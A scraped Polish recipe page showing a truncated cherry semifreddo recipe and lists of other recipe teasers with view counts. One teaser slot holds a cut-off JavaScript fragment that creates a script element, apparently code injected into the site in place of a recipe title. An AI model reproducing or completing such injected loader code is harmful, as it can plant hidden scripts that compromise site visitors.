Wiśniowe semifreddo
Źródło: https://wesolakuchnia.blogspot.com/2016/07/wisniowe-semifreddo.html
Szybki i prosty deser lodowy, nie przeslodzony. Z dodatkiem bezow ktore mozna zrobic jak zostana nam bialka.250 g smietany kremowki 36 %2 jajka7 bezow60 g cukru pudruwisnie:2 i 1/2 szklanki wisni wydrylowanych1 lyzka cukru brazowegoJajka wbijam do miski, dodaje cukier puder i ubijam na parze. Nastepnie studze je ubijajac dalej. Trzy raz ubijalam na parze i zdejmowalam z garnka.Śmietane krem...
Najnowsze przepisy
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 7
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 18
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 13
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Ta sałatka warstwowa z tuńczykiem to idealny przepis na... ⇖ 40
Przepisy z bloga
Wiosenny pasztet z jajek z groszkiem będzie królował w... ⇖ 986
Chińskie bułeczki bao buns puszyste, leciutkie. Zrobiłam... ⇖ 612
Obiad który zrobimy w 40 minut. Dorsz w sosie pomidorowym... ⇖ 815
Polędwicę przygotujecie bardzo szybko. Wystarczy tylko... ⇖ 665
Torcik z mango curd i żelką malinową na biszkopcie na... ⇖ 1843
Orientalne smaki którym się nie oprzecie.Łosoś i dorsz... ⇖ 594
Receptura powstała na zasadzie co zrobić coś dobrego i... ⇖ 565
Kremowy pyszny serniczek z piernikami, orzechami i... ⇖ 544
Ryba po grecku ale w trochę innej formie podania bo... ⇖ 573
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1809
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1184
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 679
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 565
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466









































